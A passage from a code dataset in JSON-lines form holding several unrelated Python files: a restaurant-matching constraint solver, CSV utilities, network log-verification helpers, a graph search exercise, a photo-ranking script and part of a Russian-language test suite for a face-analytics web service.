and ('TRUE' in restaurant.diet[1]) and ('TRUE' in restaurant.diet[3]):\n            return vegetarian & vegan & lactose & ~gluten\n        else: \n            return vegetarian & ~vegetarian\n\n    # For gluten free and vegan and lactose free customers\n    elif ('gluten' in customer.userdiet) and ('vegan' in customer.userdiet) and ('lactose' in customer.userdiet):\n        if ('TRUE' in restaurant.diet[2]) and ('TRUE' in restaurant.diet[0]) and ('TRUE' in restaurant.diet[3]):\n            return ~vegetarian & vegan & lactose & gluten\n        else: \n            return vegetarian & ~vegetarian\n\n\"\"\"If the user selected all dietary restrictions the \nappropriate constraint will get returned so it only \nholds true for that instance \n\nParameters: Restaurant object, Customer object\nReturns: a single all dietary constraint\n\"\"\"\ndef all_diet_constraint(restaurant,customer):\n    \n    # For users that have all the dietary restrictions\n    if ('vegetarian' in customer.userdiet) and ('vegan' in customer.userdiet) and ('gluten' in customer.userdiet) and ('lactose' in customer.userdiet):\n        if ('TRUE' in restaurant.diet[0]) and ('TRUE' in restaurant.diet[1]) and ('TRUE' in restaurant.diet[2]) and ('TRUE' in restaurant.diet[3]):\n            return vegetarian & vegan & lactose & gluten\n        else: \n            return vegetarian & ~vegetarian\n\n\"\"\"If the user selected one dining restriction the \nappropriate constraint will get returned so it only \nholds true for that instance \n\nParameters: Restaurant object, Customer object\nReturns: a single dining constraint\n\"\"\"\ndef one_dining_constraints(restaurant, customer):\n    \n    # For dine in customers\n    if 'dine-in' in customer.userdine_opt:\n        if restaurant.delivery[0] == 'TRUE':\n            return dine_in\n        else:\n            return ~dine_in & dine_in \n\n    # For take out customers\n    elif 'take-out' in customer.userdine_opt:\n        if restaurant.delivery[1] == 'TRUE':\n            return take_out\n        else:\n            return ~take_out & take_out\n\n    # For delivery customers\n    elif 'delivery' in customer.userdine_opt:\n        if restaurant.delivery[2] == 'TRUE':\n            return delivery\n        else:\n            return ~delivery & delivery\n\n\"\"\"If the user selected two dining restrictions the \nappropriate constraint will get returned so it only \nholds true for that instance \n\nParameters: Restaurant object, Customer object\nReturns: two dining constraint\n\"\"\"\ndef two_dining_constraints(restaurant, customer):\n    \n    #For users that want dine in and take out\n    if ('dine-in' in customer.userdine_opt) and ('take-out' in customer.userdine_opt):\n        if restaurant.delivery[0] == 'TRUE' and restaurant.delivery[1] == 'TRUE':\n            return dine_in & take_out & ~delivery\n        else:\n            return ~dine_in & dine_in \n    #For users that want Dine in and Delivery\n    elif ('dine-in' in customer.userdine_opt) and ('delivery' in customer.userdine_opt):\n        if restaurant.delivery[0] == 'TRUE' and restaurant.delivery[2] == 'TRUE':\n            return dine_in & ~take_out & delivery\n        else:\n            return ~dine_in & dine_in\n    \n    #For users that want Take out and Delivery\n    elif ('take-out' in customer.userdine_opt) and ('delivery' in customer.userdine_opt):\n        if restaurant.delivery[1] == 'TRUE' and restaurant.delivery[2] == 'TRUE':\n            return ~dine_in & take_out & delivery\n        else:\n            return ~dine_in & dine_in\n\n\"\"\"If the user selected all dining restrictions the \nappropriate constraint will get returned so it only \nholds true for that instance \n\nParameters: Restaurant object, Customer object\nReturns: all dining constraint\n\"\"\"\ndef all_dining_constraints(restaurant, customer):\n    \n    # For users that want dine in, Take out and delivery\n    if ('take-out' in customer.userdine_opt) and ('delivery' in customer.userdine_opt) and ('dine-in' in customer.userdine_opt):\n        if restaurant.delivery[0] == 'TRUE' and restaurant.delivery[1] == 'TRUE' and restaurant.delivery[2] == 'TRUE':\n            return dine_in & take_out & delivery\n        else:\n            return ~dine_in & dine_in \n\n\"\"\"If the user selected distance restrictions the \nappropriate constraint will get returned so it only \nholds true for that instance \n\nParameters: Restaurant object, Customer object\nReturns: distance constraint\n\"\"\"\ndef distanceConstraint(restaurant,customer):\n    \n    #For customers that want under 10 to campus\n    if customer.distance == 'under 10':\n        if restaurant.distance[0] == 'TRUE':\n            return time_under_10 & ~time_10_to_20 & ~time_over_20\n        else:\n            return time_under_10 & ~time_under_10\n\n    # For customers that want 10-20 min to campus\n    if customer.distance == '10 to 20':\n        if restaurant.distance[1] == 'TRUE':\n            return time_10_to_20 & ~time_under_10 & ~time_over_20\n        else:\n            return time_10_to_20 & ~time_10_to_20\n\n    # For customers that don't mind the distance being over 20 minutes to campus\n    if customer.distance == 'over 20':\n        if restaurant.distance[2] == 'TRUE':\n            return time_over_20 & ~time_10_to_20 & ~time_under_10\n        else:\n            return time_over_20 & ~time_over_20\n\n\"\"\"\nThis function is where the constraints get added to our\ntheory.\n\nParameters: Restaurant object and Customer object\n\"\"\"\ndef example_theory(restaurant,customer):\n\n    # Shorter variables for the objects\n    r = restaurant\n    c = customer\n\n    # Defining encoding variable\n    E = Encoding()\n\n    # Add distance and price constraints\n    E.add_constraint(distanceConstraint(r,c))\n    E.add_constraint(price_constraint(r,c))\n\n    # Add dining constraints\n    if len(c.userdine_opt) == 1:\n        E.add_constraint(one_dining_constraints(r,c))\n    elif len(c.userdine_opt) == 2:\n        E.add_constraint(two_dining_constraints(r,c))\n    elif len(c.userdine_opt) == 3:\n        E.add_constraint(all_dining_constraints(r,c))\n\n    # Add Diet constraints\n    if len(c.userdiet) == 1:\n        if 5 in c.userdiet:\n            pass\n        else:\n            E.add_constraint(single_diet_constraint(r,c))\n    elif len(c.userdiet) == 2:\n        E.add_constraint(two_diet_constraint(r,c))\n    elif len(c.userdiet) == 3:\n        E.add_constraint(three_diet_constraint(r,c))\n    elif len(c.userdiet) == 4:\n        E.add_constraint(all_diet_constraint(r,c))\n\n    # return the Encoding variable\n    return E\n\n    \n\n\"\"\"\nMain method: Where the implementation happens. 
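Each restaurant gets its own theory, and satisfiability decides its rank. 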
The theory gets solved \nwhere a sorted list from best result to worst result is displayed\nto the screen. \n\nThe user also inputs their prefrences\n\"\"\"\nif __name__ == \"__main__\":\n # This is where we will get user input information\n flag = True\n restaurant_list = readCSV()\n\n # While loop to start\n while flag:\n\n # creating example theory\n # T = example_theory()\n # Asking if user wants to continue or exit\n prog_exit = input('Welcome to the Queens restuarant finder! Press Q to quit or enter to continue.\\n')\n\n # if statement to exit\n if prog_exit.lower() == 'q':\n break\n\n # Getting users price range information\n user_price = int(input('Please select a price range: \\n 1. $ - most affordable'\\\n '\\n 2. $$ - intermediate \\n 3. $$$ - most expensive\\n'))\n\n # Telling user which price was selected as well as some exception handling\n if user_price in [1,2,3]:\n if user_price == 1:\n price = 'low'\n print('You selected $.')\n elif user_price == 2:\n price = 'med'\n print('You selected $$.')\n else:\n price = 'high'\n print('You selected $$$')\n else:\n print('Invalid input: Must be either option 1, 2 or 3')\n \n # Getting diet restrictions of the user\n user_restrictions_in = input('Please select the following diet restrictions '\n '(please separate by a comma if selecting multiple):'\n ' \\n 1. Vegan \\n 2. Vegetarian \\n 3. Gluten-free \\n'\n ' 4. lactose intolerant \\n 5. No restrictions\\n')\n\n # Since there is a possibility of having multiple restrictions, split into list\n user_selected_restrictions = user_restrictions_in.split(',')\n\n # Turning list of strings into list of integers\n for entry in range(len(user_selected_restrictions)):\n user_selected_restrictions[entry] = int(user_selected_restrictions[entry])\n\n # Getting user input for dietary restrictions\n diet = []\n if 1 in user_selected_restrictions:\n diet.append('vegan')\n if 2 in user_selected_restrictions:\n diet.append('vegetarian')\n if 3 in user_selected_restrictions:\n diet.append('gluten')\n if 4 in user_selected_restrictions:\n diet.append('lactose')\n \n # Getting user preference for dining options\n user_dine_option = input('Please select a dining option. If multiple separate by a comma: \\n 1. Dine-in \\n 2. Take-out\\n 3. Delivery\\n')\n dine_in_list = user_dine_option.split(',')\n\n final_list = []\n if '1' in dine_in_list:\n final_list.append('dine-in')\n if '2' in dine_in_list:\n final_list.append('take-out')\n if '3' in dine_in_list:\n final_list.append('delivery')\n \n\n # Getting user preference for distance\n user_distance_option = int(input('Please select a distance from Queens campus:'\n ' \\n 1. Under 10 minutes \\n 2. Between 10 and 20 minutes \\n 3. Over 20 minutes\\n'))\n\n if user_distance_option == 1:\n distance = 'under 10'\n elif user_distance_option == 2:\n distance = '10 to 20'\n else:\n distance = 'over 20'\n\n\n # Creating customer class to store information in an object for easier access\n user = customer(price, diet, final_list, distance)\n \n # Need to iterate through the list and find which restaurants match with the users preference\n # using the example theory function. 
Use T.solve to find the solution to the user's preferences and then match with\n    # restaurants that match up\n\n    # T = example_theory(user)\n    \n    # List to display results \n    finalListR = []\n\n    # Loops through each restaurant in the csv file\n    for entry in restaurant_list:\n        \n        # Variable for example theory method\n        T = example_theory(entry, user)\n        \n        \"\"\" Checks if the theory is satisfiable for each restaurant.\n        This is where we determine if the restaurant is a good fit \n        or not\"\"\"\n\n        y = T.is_satisfiable()\n        \n        # if the theory is satisfied\n        if y == True:\n            finalListR.insert(0, entry.name)\n        else:\n            finalListR.insert(len(finalListR), entry.name)\n\n    # to display all the results of restaurants best fit to worst fit\n    for i in range(len(finalListR)):\n        if i < 4:\n            print(f\"{i + 1}. %s\" % finalListR[i] + ' ' + '★ ★ ★ ★ ★')\n        elif i >= 4 and i < 7:\n            print(f\"{i + 1}. %s\" % finalListR[i] + ' ' + '★ ★ ★ ★')\n        elif i >= 7 and i < 11: \n            print(f\"{i + 1}. %s\" % finalListR[i] + ' ' + '★ ★ ★')\n        elif i >= 11 and i < 15: \n            print(f\"{i + 1}. %s\" % finalListR[i] + ' ' + '★ ★')\n        else: \n            print(f\"{i + 1}. %s\" % finalListR[i] + ' ' + '★')","repo_name":"nicholasfalconi/Restaurant-modeling-project","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":18007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"15843239490","text":"import asyncio\r\nimport time\r\nimport csv\r\n\r\nasync def readfile(filename):\r\n    res = []\r\n    csv_reader = csv.reader(open(filename, \"r\"), delimiter=',')\r\n    for row in csv_reader:\r\n        res.append(row)\r\n    return res\r\n\r\nasync def writefile(lst):\r\n    writer = csv.writer(open('combine.csv', mode='w',newline=\"\"), delimiter=\",\")\r\n    for i in lst:\r\n        writer.writerow(i)\r\n    \r\nasync def main():\r\n    print(f\"start at {time.strftime('%X')}\")\r\n    task1 = asyncio.create_task(readfile(\"AMZN_2006-01-01_to_2018-01-01.csv\"))\r\n    task2 = asyncio.create_task(readfile(\"IBM_2006-01-01_to_2018-01-01.csv\"))\r\n    lst1 = await task1\r\n    lst2 = await task2\r\n    lst2.pop(0)\r\n    await writefile(lst1+lst2)\r\n    print(f\"finish at {time.strftime('%X')}\")\r\n\r\nasyncio.run(main())\r\n","repo_name":"sheropen/Learning-Data-Science-with-Python","sub_path":"1900094810-尤俊浩-assignment-05/co-combine.py","file_name":"co-combine.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
{"seq_id":"19148776137","text":"\"\"\"Common verification functions for log\"\"\"\n\n# Python\nimport re\nimport logging\nimport operator\n\n# Genie\nfrom genie.utils.timeout import Timeout\nfrom genie.metaparser.util.exceptions import SchemaEmptyParserError\n\nlog = logging.getLogger(__name__)\n\ndef is_logging_ospf_spf_logged(device, expected_spf_delay=None, ospf_trace_log=None,\n                               max_time=60, check_interval=10):\n    \"\"\"\n    Verify SPF change log\n\n    Args:\n        device('obj'): device to use\n        expected_spf_delay('int'): SPF change value \n        ospf_trace_log('str') : OSPF trace log\n        max_time ('int'): Maximum time to keep checking\n        check_interval ('int'): How often to check\n\n    Returns: \n        Boolean \n    Raises:\n        N/A \n    \"\"\"\n    timeout = Timeout(max_time, check_interval)\n\n    # show commands: \"show log {ospf_trace_log}\"\n    while timeout.iterate():\n        try:\n            output = device.parse('show log {ospf_trace_log}'.format(\n                ospf_trace_log=ospf_trace_log))\n        except SchemaEmptyParserError:\n            timeout.sleep()\n            continue\n\n        
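# 'file-content' holds the raw log lines returned by the parser\n        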
file_content_list = output['file-content']\n\n # log message:\n # Jun 12 03:32:19.068983 OSPF SPF scheduled for topology default in 8s\n p = (\n '.*OSPF SPF scheduled for topology default in (?P\\d+)s'\n )\n\n for i in file_content_list:\n m = re.match(p, i)\n if m:\n if int(m.groupdict()['spf_change']) == expected_spf_delay:\n return True\n\n timeout.sleep()\n return False \n\ndef verify_log_exists(device, file_name, expected_log,\n max_time=60, check_interval=10, invert=False,\n match=None):\n \"\"\"\n Verify log exists\n\n Args:\n device('obj'): device to use \n file_name('str') : File name to check log\n expected_log ('str'): Expected log message\n max_time ('int'): Maximum time to keep checking\n check_interval ('int'): How often to check\n invert ('bool', 'optional'): Inverts to check if it doesn't exist\n\n Returns: \n Boolean \n Raises:\n N/A \n \"\"\"\n op = operator.truth\n if invert:\n op = lambda val : operator.not_(operator.truth(val))\n\n timeout = Timeout(max_time, check_interval)\n\n # show commands: \"show log {file_name}\"\n while timeout.iterate():\n try:\n if match:\n cmd = 'show log {file_name} | match \"{match}\"'.format(\n file_name=file_name,\n match=match)\n output = device.execute(cmd)\n log_output = device.parse(cmd, output=output)\n else:\n log_output = device.parse('show log {file_name}'.format(\n file_name=file_name))\n except SchemaEmptyParserError:\n timeout.sleep()\n continue\n\n log_found = log_output.q.contains(\n '.*{}.*'.format(expected_log), regex=True)\n \n if op(log_found):\n return True\n\n timeout.sleep()\n return False \n\n\ndef verify_no_log_output(device, file_name,max_time=60, \n check_interval=10, invert=False, match=None):\n \"\"\"\n Verify no log exists\n\n Args:\n device('obj'): device to use \n file_name('str') : File name to check log\n max_time ('int'): Maximum time to keep checking\n check_interval ('int'): How often to check\n invert ('bool', 'optional'): Inverts to check if it doesn't exist\n match ('str', 'optional'): used in show log command to specify output\n\n Returns: \n Boolean \n Raises:\n N/A \n \"\"\"\n\n timeout = Timeout(max_time, check_interval)\n while timeout.iterate():\n try:\n if match:\n cmd = 'show log {file_name} | match \"{match}\"'.format(\n file_name=file_name,\n match=match)\n output = device.execute(cmd)\n log_output = device.parse(cmd, output=output)\n else:\n log_output = device.parse('show log {file_name}'.format(\n file_name=file_name))\n except SchemaEmptyParserError:\n return True\n \n if not log_output:\n return True\n\n timeout.sleep()\n continue\n\n return False","repo_name":"Preet2fun/Ansible-server-network-automation","sub_path":"network-test-virtualenv/lib/python3.6/site-packages/genie/libs/sdk/apis/junos/log/verify.py","file_name":"verify.py","file_ext":"py","file_size_in_byte":4430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21735049740","text":"# Define dfs\r\ndef dfs(target, root, visited=[], count=0):\r\n visited.append(root)\r\n for node in target[root]:\r\n if node not in visited:\r\n count += 1\r\n visited, count = dfs(target, node, visited, count)\r\n return visited, count\r\n\r\n\r\n# 1. Input data\r\nnode_size = int(input())\r\nT = int(input())\r\n\r\ngraph = {}\r\nfor i in range(T):\r\n v1, v2 = map(int, input().split())\r\n\r\n if v1 in graph:\r\n graph[v1].append(v2)\r\n else:\r\n graph[v1] = [v2]\r\n if v2 in graph:\r\n graph[v2].append(v1)\r\n else:\r\n graph[v2] = [v1]\r\n\r\n# 2. 
Process dfs\r\nif graph[v1]:\r\n print(dfs(graph, 1)[1])\r\nelse:\r\n print(0)\r\n","repo_name":"DonghwooCho/problem-solving","sub_path":"백준/Silver/2606. 바이러스/바이러스.py","file_name":"바이러스.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40420427183","text":"import cv2, os, math, random\nfrom collections import deque\nimport argparse\n\nTARGET_PIXEL_AREA = 260000.0\n\n\n# TODO need to get new size based on bigger of the two\ndef combine_pics(impath1, impath2):\n img1 = cv2.imread(impath1)\n img2 = cv2.imread(impath2)\n switched = False\n\n if img1.shape[0] * img1.shape[1] < img2.shape[0] * img2.shape[1]:\n temp = img1\n img1 = img2\n img2 = temp\n switched = True\n\n ratio1 = float(img1.shape[1]) / float(img1.shape[0])\n new_h = int(math.sqrt(TARGET_PIXEL_AREA / ratio1) + 0.5)\n new_w1 = int((new_h * ratio1) + 0.5)\n\n ratio2 = float(img2.shape[1]) / float(img2.shape[0])\n new_w2 = int((new_h * ratio2) + 0.5)\n\n return switched, cv2.hconcat([cv2.resize(img1, (new_w1, new_h)), cv2.resize(img2, (new_w2, new_h))])\n\n\ndef is_first_better(combined, impath1, impath2, is_switched):\n winName = impath1 + \" ||| \" + impath2 if not is_switched else impath2 + \" ||| \" + impath1\n cv2.namedWindow(winName)\n cv2.moveWindow(winName, 0, 150)\n cv2.imshow(winName, combined)\n while True:\n key = cv2.waitKeyEx(0)\n if key in [ord('a'), ord('s'), ord('d'), ord('f')]:\n cv2.destroyAllWindows()\n return True\n elif key in [ord('j'), ord('k'), ord('l'), ord(';')]:\n cv2.destroyAllWindows()\n return False\n else:\n cv2.destroyAllWindows()\n break\n\n\ndef get_full_list(parent):\n lst = []\n for root, dirs, files in os.walk(parent):\n for file in files:\n if not (file == '.DS_Store' or file.startswith('Icon') or file == '.dropbox' or file.startswith('blogpic')\n or file.endswith('.m4v') or file.endswith('.MOV') or file.endswith('mov') or file.endswith('.txt')):\n lst.append(os.path.join(root, file))\n with open('full_pic_list.txt', 'w') as f:\n f.write('\\n'.join(lst))\n return lst\n\n\ndef get_txt_list(path):\n with open(path, 'r') as fi:\n lst = fi.readlines()\n random.shuffle(lst)\n return lst\n\ndef print_ends():\n with open('full_pic_list.txt', 'r') as f:\n lst = f.readlines()\n ends = list(map(lambda x: x[-4:], lst))\n end_set = set(ends)\n print(end_set)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('in_dir', help='within Camera Uploads')\n args = parser.parse_args()\n\n parent = '/Users/waltmart/Dropbox (Personal)/Camera Uploads/' + args.in_dir + '/'\n pic_list = get_full_list(parent)\n rand_pic_list = pic_list.copy()\n random.shuffle(rand_pic_list)\n q = deque(rand_pic_list)\n\n # for n in [2500, 2000, 1500, 1000, 500, 200, 100, 50, 20, 10]:\n # for n in [1500, 1000, 500, 200, 100, 50, 20, 10]:\n for n in [1000, 500, 200, 100, 50, 20, 10, 5]:\n # for n in [100, 50, 20, 10, 5, 2, 1]:\n while len(q) > n:\n pic1 = q.popleft()\n pic2 = q.popleft()\n switched, combined = combine_pics(pic1, pic2)\n if is_first_better(combined, pic1[len(parent):], pic2[len(parent):], switched):\n q.append(pic1) if not switched else q.append(pic2)\n else:\n q.append(pic2) if not switched else q.append(pic1)\n\n if not os.path.exists(parent + 'lists/'):\n os.makedirs(parent + 'lists/')\n\n with open(parent + 'lists/' + str(n) + '.txt', 'w+') as f:\n 
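# write this round's surviving image paths, one per line\n            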
+{"seq_id":"1146922230","text":"def csv_to_list1(csv_file):\n    result = []\n    for line in csv_file:\n        linia = line.rstrip('\\r\\n')\n        lista = linia.split(',')\n        result.append(lista)\n    return result\n\n\ndef csv_to_list(csv_file):\n    return [line.rstrip('\\r\\n').split(',') for line in csv_file]\n\ndef csv_to_list2(csv_file):\n    expected_len = None\n    result = []\n\n    for line in csv_file:\n        record = line.rstrip('\\r\\n').split(',')\n        if expected_len is None:\n            expected_len = len(record)\n        elif len(record) != expected_len:\n            raise ValueError('Malformed CSV file')\n        result.append(record)\n    return result\n\n\ndef csv_to_list3(csv_file):\n    result = [csv_file.readline().rstrip('\\r\\n').split(',')]\n    for line in csv_file:\n        record = line.rstrip('\\r\\n').split(',')\n        if len(record) != len(result[0]):\n            raise ValueError('Malformed CSV file.')\n        result.append(record)\n    return result\n\n\nif __name__ == '__main__':\n    with open('dane.csv') as csv_file:\n        print(csv_to_list1(csv_file))\n\n","repo_name":"DWLCPawelG/TESTER_SCHOOL","sub_path":"day3/csv_to_list.py","file_name":"csv_to_list.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16629846685","text":"import time\nimport random\nfrom typing import Tuple\n\nfrom lib.client.zmqClient import ZmqClient\nfrom lib.client.soapClient import SoapClient\nfrom lib.log_and_statistic.statistic import Statistic\n\nfrom scripts.xml import zmq\nfrom scripts.common import graph, tools\nfrom scripts.tools import analytics\n\nfrom scripts.ws import users as ws_users\nfrom scripts.ws import common as ws_common\nfrom scripts.ws import ewriter as ws_ewriter\nfrom scripts.ws import faceva as ws_analytics\n\n\nclass TestAnalytics:\n    \"\"\"Класс-обертка с тестами по аналитике\n\n    \"\"\"\n    def __init__(self, input_data: dict, config: dict, statistic: Statistic):\n        self._statistic: Statistic = statistic\n        self._logger = self._statistic.get_log().get_logger(\"test/test_Analytics\")\n\n        self._input_data: dict = input_data\n        self._config: dict = config\n\n        self._server_ip: str = config['server']['ip']\n        self._server_port: int = config['server']['ws_port']\n        self._login: str = config['user']['login']\n        self._password: str = config['user']['password']\n        self._server_db_path: str = config['server']['db_path']\n\n    def setup(self):\n        \"\"\"Данный метод вызывается перед запуском каждого теста.\n\n        \"\"\"\n        pass\n\n    def teardown(self):\n        \"\"\"Данный метод вызывается по завершению каждого теста.\n\n        \"\"\"\n        pass\n\n    def test_faceva_get_event(self):\n        \"\"\"Тест проверяет ws метод FaceVA:GetEvent.\n        Тест может работать в двух режимах: skd_mode = True - используются только ws методы лиц, то есть точно также,\n        как и вызвает их СКД; skd_mode = False - за эталон берутся события системы и сравниваются с событиями от лиц,\n        таким образом проверяются возможные пропуски.\n\n        max_counts_event - кол-во событий для проверки, при достижении которых тест должен завершиться.\n        event_getting_timeout - как часто запрашивать события, в случае если они не были найдены.\n\n        \"\"\"\n        ws_client = SoapClient(self._server_ip, self._server_port, self._config, self._statistic)\n        token: str = 
ws_users.server_login(ws_client, self._login, self._password, self._statistic)\n current_time = ws_common.get_current_server_time(ws_client, token, self._statistic)\n\n events_count = 0\n last_event_time = current_time\n last_event_id = 0\n from_event = 0\n while True:\n if self._input_data['skd_mode']:\n events: Tuple[dict] = ws_analytics.faceva_get_event(ws_client, token, from_event, self._statistic)\n else:\n events: Tuple[dict] = ws_ewriter.select(ws_client, token, last_event_time, None, None, [20013], None,\n None, None, self._statistic)\n events: list = list(events)\n events.reverse()\n\n if not events or len(events) == 1 and events[0] == {}:\n time.sleep(self._input_data['event_getting_timeout'])\n continue\n events: tuple = tuple(events)\n self._statistic.append_info(\"Получены события\", \"ИНФО\")\n\n for index, event in enumerate(events):\n events_count += 1\n if self._input_data['skd_mode'] is False:\n # пропускаем старые (уже проверенные) события\n if event['evtid'] <= last_event_id:\n events_count -= 1\n continue\n\n faceva_events: Tuple[dict] = ws_analytics.faceva_get_event(ws_client, token, 0, self._statistic)\n index_faceva_event = tools.get_dict_by_keys_values(faceva_events, ('event', ), (event['evtid'], ))\n\n if index_faceva_event < 0:\n self._statistic.append_error(\"Нет события: \" + str(event['evtid']) + \"!\", \"КРИТ\", True)\n\n person_id = faceva_events[index_faceva_event]['person']\n persons = ws_analytics.faceva_get_data_base(ws_client, token, self._statistic)\n index_person = tools.get_dict_by_keys_values(persons, ('id', ), (person_id, ))\n\n if index_person < 0:\n self._statistic.append_error(\"В базе нет id: \" + str(person_id) + \"!\", \"КРИТ\", True)\n\n person_name = persons[index_person]['name']\n\n if event['evtcomment'].find(person_name) < 0:\n self._statistic.append_error(\"ФИО персоны не совпадают в событии \" + str(event['evtid']) + \"!\",\n \"НЕВАЛИД ЗНАЧ\", False)\n\n event_id = faceva_events[index_faceva_event]['event']\n time_ = faceva_events[index_faceva_event]['time']\n camera = faceva_events[index_faceva_event]['camera']\n\n event_time: str = event['evttime']\n date_event_time = tools.get_date_from_str(event_time)\n last_event_time = str(tools.convert_time_to_gtc(date_event_time))[:-3]\n last_event_id = event_id\n else:\n event_id = event['event']\n time_ = event['time']\n camera = event['camera']\n from_event = event_id\n\n # Проверка получения кадра по событию.\n # Выполнение ws метода FaceVA:GetFrame\n ws_result = ws_analytics.faceva_get_frame(ws_client, token, camera, time_, self._statistic)\n if tools.check_keys_exist(ws_result, ['img'], 'result[0]', False, self._statistic) is False:\n self._statistic.append_error(\"По событию \" + str(event_id) + \"!\", \"ОТСУТСТВУЕТ КАДР\", True)\n elif not ws_result['img']:\n self._statistic.append_error(\"По событию \" + str(event_id) + \"!\", \"ОТСУТСТВУЕТ КАДР\", True)\n else:\n self._statistic.append_success(\"По событию '\" + str(event_id) + \"'!\", \"ПОЛУЧЕН КАДР\")\n\n # Проверка получения картинки по событию.\n # Выполнение ws метода FaceVA:GetEventImage\n ws_result = ws_analytics.faceva_get_event_image(ws_client, token, event_id, time_, self._statistic)\n if tools.check_keys_exist(ws_result, ['img'], 'result[0]', False, self._statistic) is False:\n self._statistic.append_error(\"По событию \" + str(event_id) + \"!\", \"ОТСУТСТВУЕТ КАРТИНКА\", True)\n elif not ws_result['img']:\n self._statistic.append_error(\"По событию \" + str(event_id) + \"!\", \"ОТСУТСТВУЕТ КАРТИНКА\", True)\n else:\n 
self._statistic.append_success(\"По событию \" + str(event_id) + \"!\", \"ПОЛУЧЕНА КАРТИНКА\")\n\n                if events_count >= self._input_data['max_count_events']:\n                    break\n            if events_count >= self._input_data['max_count_events']:\n                break\n\n    def test_faceva_get_faces(self):\n        \"\"\"Тест проверяет ws метод FaceVA:GetFaces.\n        Тест может работать в двух режимах: skd_mode = True - используются только ws методы лиц, то есть точно также,\n        как и вызвает их СКД; skd_mode = False - за эталон берутся события системы и сравниваются с событиями от лиц,\n        таким образом проверяются возможные пропуски.\n\n        max_counts_event - кол-во событий для проверки, при достижении которых тест должен завершиться.\n        event_getting_timeout - как часто запрашивать события, в случае если они не были найдены.\n\n        \"\"\"\n        ws_client = SoapClient(self._server_ip, self._server_port, self._config, self._statistic)\n        token: str = ws_users.server_login(ws_client, self._login, self._password, self._statistic)\n        current_time = ws_common.get_current_server_time(ws_client, token, self._statistic)\n\n        events_count = 0\n        last_event_time = current_time\n        last_event_id = 0\n        from_event = 0\n        while True:\n            if events_count >= self._input_data['max_count_events']:\n                break\n            if self._input_data['skd_mode']:\n                events: Tuple[dict] = ws_analytics.faceva_get_faces(ws_client, token, from_event, self._statistic)\n            else:\n                events: Tuple[dict] = ws_ewriter.select(ws_client, token, last_event_time, None, None, [20072],\n                                                        self._statistic)\n            events: list = list(events)\n            events.reverse()\n\n            if not events or len(events) == 1 and events[0] == {}:\n                time.sleep(self._input_data['event_getting_timeout'])\n                continue\n\n            self._statistic.append_info(\"Получены события\", \"ИНФО\")\n\n            for index, event in enumerate(events):\n                if events_count >= self._input_data['max_count_events']:\n                    break\n                events_count += 1\n                if self._input_data['skd_mode'] is False:\n                    if event['evtid'] <= last_event_id:\n                        events_count -= 1\n                        continue\n\n                    faceva_events: Tuple[dict] = ws_analytics.faceva_get_faces(ws_client, token, last_event_id,\n                                                                               self._statistic)\n                    index_faceva_event = tools.get_dict_by_keys_values(faceva_events, ['event'], [event['evtid']])\n\n                    if index_faceva_event < 0:\n                        self._statistic.append_error(\"Нет события: '\" + str(event['evtid']) + \"'\", \"КРИТ\", True)\n\n                    event_id = faceva_events[index_faceva_event]['event']\n                    time_ = faceva_events[index_faceva_event]['time']\n                    camera = faceva_events[index_faceva_event]['camera']\n                    img = faceva_events[index_faceva_event]['img']\n\n                    event_time: str = event['evttime']\n                    date_event_time = tools.get_date_from_str(event_time)\n                    last_event_time = str(tools.convert_time_to_gtc(date_event_time))[:-3]\n                    last_event_id = event_id\n                else:\n                    event_id = event['event']\n                    time_ = event['time']\n                    camera = event['camera']\n                    img = event['img']\n                    from_event = event_id\n\n                # Проверка получения кадра по событию.\n                # Выполнение ws метода FaceVA:GetFrame\n                ws_result = ws_analytics.faceva_get_frame(ws_client, token, camera, time_, self._statistic)\n                if tools.check_keys_exist(ws_result, ['img'], 'result[0]', False, self._statistic) is False:\n                    self._statistic.append_error(\"По событию '\" + str(event_id) + \"'!\", \"ОТСУТСТВУЕТ_КАДР\", True)\n                elif not ws_result['img']:\n                    self._statistic.append_error(\"По событию '\" + str(event_id) + \"'!\", \"ОТСУТСТВУЕТ_КАДР\", True)\n                else:\n                    self._statistic.append_success(\"По событию '\" + str(event_id) + \"'!\", \"ПОЛУЧЕН_КАДР\")\n\n                # Проверка получения картинки по событию.\n                if not img:\n                    
self._statistic.append_error(\"По событию '\" + str(event_id) + \"'!\", \"ОТСУТСТВУЕТ_КАРТИНКА\", True)\n else:\n self._statistic.append_success(\"По событию '\" + str(event_id) + \"'!\", \"ПОЛУЧЕНА_КАРТИНКА\")\n\n def test_faceva_update_person(self):\n \"\"\"Тест проверяет работу ws метода FaceVA:UpdatePerson.\n\n Тест добавляет с помощью этого ws метода персон из указанной директории, в которой находятся папки,\n имена которых являются ФИО персоны, а внутри каждой папки фотографии этой персоны. После каждого добавления\n вызывается метода FaceVA:GetDataBase с целью фактической проверки добавления человека.\n \"\"\"\n ws_client = SoapClient(self._server_ip, self._server_port, self._config, self._statistic)\n token = ws_users.server_login(ws_client, self._login, self._password, self._statistic)\n\n # получение текущего списка людей в БД\n old_persons_db = ws_analytics.faceva_get_data_base(ws_client, self._login, self._statistic)\n persons_dir = tools.get_dirs(self._input_data[\"persons_dir\"])\n\n for person in persons_dir:\n name: str = person\n category: str = str(random.randint(0, 100000))\n comment: str = random.choice([\"На больничном\", \"Удаленная работа\", \"Полная ставка\", \"Пол ставки\", \"Фрилансер\"])\n information: str = random.choice([\"Программист\", \"Тестировщик\", \"Директор\", \"Начальник отдела тестирования\",\n \"Менеджер по продажам\"])\n department: str = random.choice([\"Тестирования\", \"Разработки ПО\", \"Продаж\", \"Кадров\"])\n person_photos: Tuple[str] = tools.get_files(self._input_data[\"persons_dir\"] + \"/\" + person)\n photo_paths = []\n for person_photo in person_photos:\n photo_paths.append(self._input_data[\"persons_dir\"] + \"/\" + person + \"/\" + person_photo)\n photos_base64: Tuple[str] = tools.get_photos_base64(tuple(photo_paths))\n faces = []\n for photo_base64 in 